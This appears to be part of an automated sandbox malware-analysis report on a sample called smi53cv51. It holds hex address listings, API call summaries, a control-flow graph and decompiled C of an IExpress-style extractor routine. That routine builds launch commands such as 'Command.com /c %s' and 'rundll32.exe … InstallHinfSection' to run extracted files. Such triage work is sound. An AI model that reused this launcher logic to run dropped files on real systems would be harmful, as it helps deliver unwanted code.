                                                                                                                                                                                                      0x00a63d75
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63d8f
                                                                                                                                                                                                      0x00a63d96
                                                                                                                                                                                                      0x00a63d98
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63d98
                                                                                                                                                                                                      0x00a63c8f
                                                                                                                                                                                                      0x00a63c98
                                                                                                                                                                                                      0x00a63cf1
                                                                                                                                                                                                      0x00a63cf3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63cfe
                                                                                                                                                                                                      0x00a63d11
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63d11
                                                                                                                                                                                                      0x00a63c9c
                                                                                                                                                                                                      0x00a63ca5
                                                                                                                                                                                                      0x00a63ca7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63cad
                                                                                                                                                                                                      0x00a63cb2
                                                                                                                                                                                                      0x00a63cb7
                                                                                                                                                                                                      0x00a63cc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63ce8
                                                                                                                                                                                                      0x00a63cec
                                                                                                                                                                                                      0x00a63ced
                                                                                                                                                                                                      0x00a63ced
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63ce8
                                                                                                                                                                                                      0x00a63c9e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63c9e
                                                                                                                                                                                                      0x00a63c56
                                                                                                                                                                                                      0x00a63d35
                                                                                                                                                                                                      0x00a63d35
                                                                                                                                                                                                      0x00a63d3c
                                                                                                                                                                                                      0x00a63d48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63d48
                                                                                                                                                                                                      0x00a63c03
                                                                                                                                                                                                      0x00a63be2
                                                                                                                                                                                                      0x00a63be7
                                                                                                                                                                                                      0x00a63bee
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A63C11
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A63CDC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A68C42), ref: 00A63D8F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A63E26
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00A68C42), ref: 00A63EFF
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00A68C42), ref: 00A63F1F
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00A68C42), ref: 00A63F40
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00A68C42), ref: 00A63F47
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A68C42), ref: 00A63F76
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A68C42), ref: 00A63F80
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A68C42), ref: 00A63FC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                      • API String ID: 1032054927-727772788
                                                                                                                                                                                                      • Opcode ID: 77d49df9f4bf368e86e1abc2c735a5e419e3678bd29f3bfb6162c458b16da989
                                                                                                                                                                                                      • Instruction ID: 96b01e60696b2392ea4465ec72904aea31237fb043ecb3ac6997bea6d4954519
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77d49df9f4bf368e86e1abc2c735a5e419e3678bd29f3bfb6162c458b16da989
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BB11272A083009FDB20DF64C945B6B7AF8EB95740F100A2DFA95D61D1DBB4CA47CB92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 141 a61ae8-a61b2c call a61680 144 a61b2e-a61b39 141->144 145 a61b3b-a61b40 141->145 146 a61b46-a61b61 call a61a84 144->146 145->146 149 a61b63-a61b65 146->149 150 a61b9f-a61bc2 call a61781 call a6658a 146->150 152 a61b68-a61b6d 149->152 157 a61bc7-a61bd3 call a666c8 150->157 152->152 154 a61b6f-a61b74 152->154 154->150 156 a61b76-a61b7b 154->156 158 a61b83-a61b86 156->158 159 a61b7d-a61b81 156->159 166 a61d73-a61d7f call a666c8 157->166 167 a61bd9-a61bf1 CompareStringA 157->167 158->150 162 a61b88-a61b8a 158->162 159->158 161 a61b8c-a61b9d call a61680 159->161 161->157 162->150 162->161 175 a61d81-a61d99 CompareStringA 166->175 176 a61df8-a61e09 LocalAlloc 166->176 167->166 168 a61bf7-a61c07 GetFileAttributesA 167->168 170 a61d53-a61d5e 168->170 171 a61c0d-a61c15 168->171 173 a61d64-a61d6e call a644b9 170->173 171->170 174 a61c1b-a61c33 call a61a84 171->174 189 a61e94-a61ea4 call a66ce0 173->189 191 a61c35-a61c38 174->191 192 a61c50-a61c61 LocalAlloc 174->192 175->176 181 a61d9b-a61da2 175->181 178 a61dd4-a61ddf 176->178 179 a61e0b-a61e1b GetFileAttributesA 176->179 178->173 183 a61e67-a61e73 call a61680 179->183 184 a61e1d-a61e1f 179->184 186 a61da5-a61daa 181->186 197 a61e78-a61e84 call a62aac 183->197 184->183 190 a61e21-a61e3e call a61781 184->190 186->186 187 a61dac-a61db4 186->187 195 a61db7-a61dbc 187->195 190->197 211 a61e40-a61e43 190->211 193 a61c40-a61c4b call a61a84 191->193 194 a61c3a 191->194 192->178 196 a61c67-a61c72 192->196 193->192 194->193 195->195 201 a61dbe-a61dd2 LocalAlloc 195->201 202 a61c74 196->202 203 a61c79-a61cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->203 210 a61e89-a61e92 197->210 201->178 207 a61de1-a61df3 call a6171e 201->207 202->203 208 a61cc2-a61ccc 203->208 209 a61cf8-a61d07 203->209 207->210 213 a61cd3-a61cf3 call a61680 * 2 208->213 214 a61cce 208->214 216 a61d23 209->216 217 a61d09-a61d21 GetShortPathNameA 209->217 210->189 211->197 215 a61e45-a61e65 call a616b3 * 2 211->215 213->210 214->213 215->197 218 a61d28-a61d2b 216->218 217->218 223 a61d32-a61d4e call a6171e 218->223 224 a61d2d 218->224 223->210 224->223
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00A61AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v527;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				char _v1552;
                                                                                                                                                                                                      				CHAR* _v1556;
                                                                                                                                                                                                      				int* _v1560;
                                                                                                                                                                                                      				CHAR** _v1564;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                      				CHAR* _t53;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				char* _t57;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				CHAR* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				signed char _t65;
                                                                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                                                                      				CHAR* _t90;
                                                                                                                                                                                                      				CHAR* _t92;
                                                                                                                                                                                                      				char _t105;
                                                                                                                                                                                                      				char _t106;
                                                                                                                                                                                                      				CHAR** _t111;
                                                                                                                                                                                                      				CHAR* _t115;
                                                                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                                                                      				void* _t126;
                                                                                                                                                                                                      				CHAR* _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				void* _t138;
                                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				intOrPtr* _t146;
                                                                                                                                                                                                      				char* _t148;
                                                                                                                                                                                                      				CHAR* _t151;
                                                                                                                                                                                                      				void* _t152;
                                                                                                                                                                                                      				CHAR* _t155;
                                                                                                                                                                                                      				CHAR* _t156;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t48 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                      				_t108 = __ecx;
                                                                                                                                                                                                      				_v1564 = _a4;
                                                                                                                                                                                                      				_v1560 = _a8;
                                                                                                                                                                                                      				E00A61680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                      				if(_v528 != 0x22) {
                                                                                                                                                                                                      					_t135 = " ";
                                                                                                                                                                                                      					_t53 =  &_v528;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t135 = "\"";
                                                                                                                                                                                                      					_t53 =  &_v527;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t111 =  &_v1556;
                                                                                                                                                                                                      				_v1556 = _t53;
                                                                                                                                                                                                      				_t54 = E00A61A84(_t111, _t135);
                                                                                                                                                                                                      				_t156 = _v1556;
                                                                                                                                                                                                      				_t151 = _t54;
                                                                                                                                                                                                      				if(_t156 == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_push(_t111);
                                                                                                                                                                                                      					E00A61781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      					E00A6658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t132 = _t156;
                                                                                                                                                                                                      					_t148 =  &(_t132[1]);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t105 =  *_t132;
                                                                                                                                                                                                      						_t132 =  &(_t132[1]);
                                                                                                                                                                                                      					} while (_t105 != 0);
                                                                                                                                                                                                      					_t111 = _t132 - _t148;
                                                                                                                                                                                                      					if(_t111 < 3) {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t106 = _t156[1];
                                                                                                                                                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						E00A61680( &_v268, 0x104, _t156);
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t138 = 0x2e;
                                                                                                                                                                                                      						_t57 = E00A666C8(_t156, _t138);
                                                                                                                                                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                      							_t139 = 0x2e;
                                                                                                                                                                                                      							_t115 = _t156;
                                                                                                                                                                                                      							_t58 = E00A666C8(_t115, _t139);
                                                                                                                                                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									goto L43;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                      									E00A61680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_push(_t115);
                                                                                                                                                                                                      									_t108 = 0x400;
                                                                                                                                                                                                      									E00A61781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                      										E00A616B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                      										E00A616B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = _t156;
                                                                                                                                                                                                      								 *_t156 = 0;
                                                                                                                                                                                                      								E00A62AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                      								goto L53;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t108 = "Command.com /c %s";
                                                                                                                                                                                                      								_t125 = "Command.com /c %s";
                                                                                                                                                                                                      								_t145 = _t125 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t76 =  *_t125;
                                                                                                                                                                                                      									_t125 = _t125 + 1;
                                                                                                                                                                                                      								} while (_t76 != 0);
                                                                                                                                                                                                      								_t126 = _t125 - _t145;
                                                                                                                                                                                                      								_t146 =  &_v268;
                                                                                                                                                                                                      								_t157 = _t146 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t77 =  *_t146;
                                                                                                                                                                                                      									_t146 = _t146 + 1;
                                                                                                                                                                                                      								} while (_t77 != 0);
                                                                                                                                                                                                      								_t140 = _t146 - _t157;
                                                                                                                                                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                      								if(_t156 != 0) {
                                                                                                                                                                                                      									E00A6171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                      									goto L53;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L43;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t140 = 0x525;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t60 =  &_v268;
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t140 = "[";
                                                                                                                                                                                                      								_v1556 = _t151;
                                                                                                                                                                                                      								_t90 = E00A61A84( &_v1556, "[");
                                                                                                                                                                                                      								if(_t90 != 0) {
                                                                                                                                                                                                      									if( *_t90 != 0) {
                                                                                                                                                                                                      										_v1556 = _t90;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "]";
                                                                                                                                                                                                      									E00A61A84( &_v1556, "]");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									L43:
                                                                                                                                                                                                      									_t60 = 0;
                                                                                                                                                                                                      									_t140 = 0x4b5;
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									_push(0x10);
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									L35:
                                                                                                                                                                                                      									_push(_t60);
                                                                                                                                                                                                      									E00A644B9(0, _t140);
                                                                                                                                                                                                      									_t62 = 0;
                                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t155 = _v1556;
                                                                                                                                                                                                      									_t92 = _t155;
                                                                                                                                                                                                      									if( *_t155 == 0) {
                                                                                                                                                                                                      										_t92 = "DefaultInstall";
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									 *0xa69120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                      									 *_v1560 = 1;
                                                                                                                                                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa61140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                      										 *0xa69a34 =  *0xa69a34 & 0xfffffffb;
                                                                                                                                                                                                      										if( *0xa69a40 != 0) {
                                                                                                                                                                                                      											_t108 = "setupapi.dll";
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t108 = "setupx.dll";
                                                                                                                                                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_push( &_v268);
                                                                                                                                                                                                      										_push(_t155);
                                                                                                                                                                                                      										E00A6171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										 *0xa69a34 =  *0xa69a34 | 0x00000004;
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										E00A61680(_t108, 0x104, _t155);
                                                                                                                                                                                                      										_t140 = 0x200;
                                                                                                                                                                                                      										E00A61680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L53:
                                                                                                                                                                                                      									_t62 = 1;
                                                                                                                                                                                                      									 *_v1564 = _t156;
                                                                                                                                                                                                      									L54:
                                                                                                                                                                                                      									_pop(_t152);
                                                                                                                                                                                                      									return E00A66CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}














































                                                                                                                                                                                                      0x00a61af3
                                                                                                                                                                                                      0x00a61afa
                                                                                                                                                                                                      0x00a61b07
                                                                                                                                                                                                      0x00a61b09
                                                                                                                                                                                                      0x00a61b1a
                                                                                                                                                                                                      0x00a61b20
                                                                                                                                                                                                      0x00a61b2c
                                                                                                                                                                                                      0x00a61b3b
                                                                                                                                                                                                      0x00a61b40
                                                                                                                                                                                                      0x00a61b2e
                                                                                                                                                                                                      0x00a61b2e
                                                                                                                                                                                                      0x00a61b33
                                                                                                                                                                                                      0x00a61b33
                                                                                                                                                                                                      0x00a61b46
                                                                                                                                                                                                      0x00a61b4c
                                                                                                                                                                                                      0x00a61b52
                                                                                                                                                                                                      0x00a61b57
                                                                                                                                                                                                      0x00a61b5d
                                                                                                                                                                                                      0x00a61b61
                                                                                                                                                                                                      0x00a61b9f
                                                                                                                                                                                                      0x00a61b9f
                                                                                                                                                                                                      0x00a61bb1
                                                                                                                                                                                                      0x00a61bc2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61b63
                                                                                                                                                                                                      0x00a61b63
                                                                                                                                                                                                      0x00a61b65
                                                                                                                                                                                                      0x00a61b68
                                                                                                                                                                                                      0x00a61b68
                                                                                                                                                                                                      0x00a61b6a
                                                                                                                                                                                                      0x00a61b6b
                                                                                                                                                                                                      0x00a61b6f
                                                                                                                                                                                                      0x00a61b74
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61b76
                                                                                                                                                                                                      0x00a61b7b
                                                                                                                                                                                                      0x00a61b86
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61b8c
                                                                                                                                                                                                      0x00a61b8c
                                                                                                                                                                                                      0x00a61b98
                                                                                                                                                                                                      0x00a61bc7
                                                                                                                                                                                                      0x00a61bc9
                                                                                                                                                                                                      0x00a61bcc
                                                                                                                                                                                                      0x00a61bd3
                                                                                                                                                                                                      0x00a61d75
                                                                                                                                                                                                      0x00a61d76
                                                                                                                                                                                                      0x00a61d78
                                                                                                                                                                                                      0x00a61d7f
                                                                                                                                                                                                      0x00a61e05
                                                                                                                                                                                                      0x00a61e09
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61e12
                                                                                                                                                                                                      0x00a61e1b
                                                                                                                                                                                                      0x00a61e73
                                                                                                                                                                                                      0x00a61e21
                                                                                                                                                                                                      0x00a61e21
                                                                                                                                                                                                      0x00a61e28
                                                                                                                                                                                                      0x00a61e37
                                                                                                                                                                                                      0x00a61e3e
                                                                                                                                                                                                      0x00a61e52
                                                                                                                                                                                                      0x00a61e60
                                                                                                                                                                                                      0x00a61e60
                                                                                                                                                                                                      0x00a61e3e
                                                                                                                                                                                                      0x00a61e79
                                                                                                                                                                                                      0x00a61e7b
                                                                                                                                                                                                      0x00a61e84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61d9b
                                                                                                                                                                                                      0x00a61d9b
                                                                                                                                                                                                      0x00a61da0
                                                                                                                                                                                                      0x00a61da2
                                                                                                                                                                                                      0x00a61da5
                                                                                                                                                                                                      0x00a61da5
                                                                                                                                                                                                      0x00a61da7
                                                                                                                                                                                                      0x00a61da8
                                                                                                                                                                                                      0x00a61dac
                                                                                                                                                                                                      0x00a61dae
                                                                                                                                                                                                      0x00a61db4
                                                                                                                                                                                                      0x00a61db7
                                                                                                                                                                                                      0x00a61db7
                                                                                                                                                                                                      0x00a61db9
                                                                                                                                                                                                      0x00a61dba
                                                                                                                                                                                                      0x00a61dbe
                                                                                                                                                                                                      0x00a61dc3
                                                                                                                                                                                                      0x00a61dce
                                                                                                                                                                                                      0x00a61dd2
                                                                                                                                                                                                      0x00a61deb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61df0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61dd2
                                                                                                                                                                                                      0x00a61bf7
                                                                                                                                                                                                      0x00a61bfe
                                                                                                                                                                                                      0x00a61c07
                                                                                                                                                                                                      0x00a61d55
                                                                                                                                                                                                      0x00a61d5a
                                                                                                                                                                                                      0x00a61d5b
                                                                                                                                                                                                      0x00a61d5d
                                                                                                                                                                                                      0x00a61d5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61c1b
                                                                                                                                                                                                      0x00a61c1b
                                                                                                                                                                                                      0x00a61c20
                                                                                                                                                                                                      0x00a61c2c
                                                                                                                                                                                                      0x00a61c33
                                                                                                                                                                                                      0x00a61c38
                                                                                                                                                                                                      0x00a61c3a
                                                                                                                                                                                                      0x00a61c3a
                                                                                                                                                                                                      0x00a61c40
                                                                                                                                                                                                      0x00a61c4b
                                                                                                                                                                                                      0x00a61c4b
                                                                                                                                                                                                      0x00a61c5d
                                                                                                                                                                                                      0x00a61c61
                                                                                                                                                                                                      0x00a61dd4
                                                                                                                                                                                                      0x00a61dd4
                                                                                                                                                                                                      0x00a61dd6
                                                                                                                                                                                                      0x00a61ddb
                                                                                                                                                                                                      0x00a61ddc
                                                                                                                                                                                                      0x00a61dde
                                                                                                                                                                                                      0x00a61d64
                                                                                                                                                                                                      0x00a61d64
                                                                                                                                                                                                      0x00a61d67
                                                                                                                                                                                                      0x00a61d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61c67
                                                                                                                                                                                                      0x00a61c67
                                                                                                                                                                                                      0x00a61c6d
                                                                                                                                                                                                      0x00a61c72
                                                                                                                                                                                                      0x00a61c74
                                                                                                                                                                                                      0x00a61c74
                                                                                                                                                                                                      0x00a61c8e
                                                                                                                                                                                                      0x00a61c99
                                                                                                                                                                                                      0x00a61cc0
                                                                                                                                                                                                      0x00a61cf8
                                                                                                                                                                                                      0x00a61d07
                                                                                                                                                                                                      0x00a61d23
                                                                                                                                                                                                      0x00a61d09
                                                                                                                                                                                                      0x00a61d14
                                                                                                                                                                                                      0x00a61d1b
                                                                                                                                                                                                      0x00a61d1b
                                                                                                                                                                                                      0x00a61d2b
                                                                                                                                                                                                      0x00a61d2d
                                                                                                                                                                                                      0x00a61d2d
                                                                                                                                                                                                      0x00a61d38
                                                                                                                                                                                                      0x00a61d39
                                                                                                                                                                                                      0x00a61d46
                                                                                                                                                                                                      0x00a61cc2
                                                                                                                                                                                                      0x00a61cc2
                                                                                                                                                                                                      0x00a61ccc
                                                                                                                                                                                                      0x00a61cce
                                                                                                                                                                                                      0x00a61cce
                                                                                                                                                                                                      0x00a61cdb
                                                                                                                                                                                                      0x00a61ce6
                                                                                                                                                                                                      0x00a61cee
                                                                                                                                                                                                      0x00a61cee
                                                                                                                                                                                                      0x00a61e89
                                                                                                                                                                                                      0x00a61e91
                                                                                                                                                                                                      0x00a61e92
                                                                                                                                                                                                      0x00a61e94
                                                                                                                                                                                                      0x00a61e97
                                                                                                                                                                                                      0x00a61ea4
                                                                                                                                                                                                      0x00a61ea4
                                                                                                                                                                                                      0x00a61c61
                                                                                                                                                                                                      0x00a61c07
                                                                                                                                                                                                      0x00a61bd3
                                                                                                                                                                                                      0x00a61b7b

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00A61BE7
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00A61BFE
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00A61C57
                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00A61C88
                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A61140,00000000,00000008,?), ref: 00A61CB8
                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32 ref: 00A61D1B
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
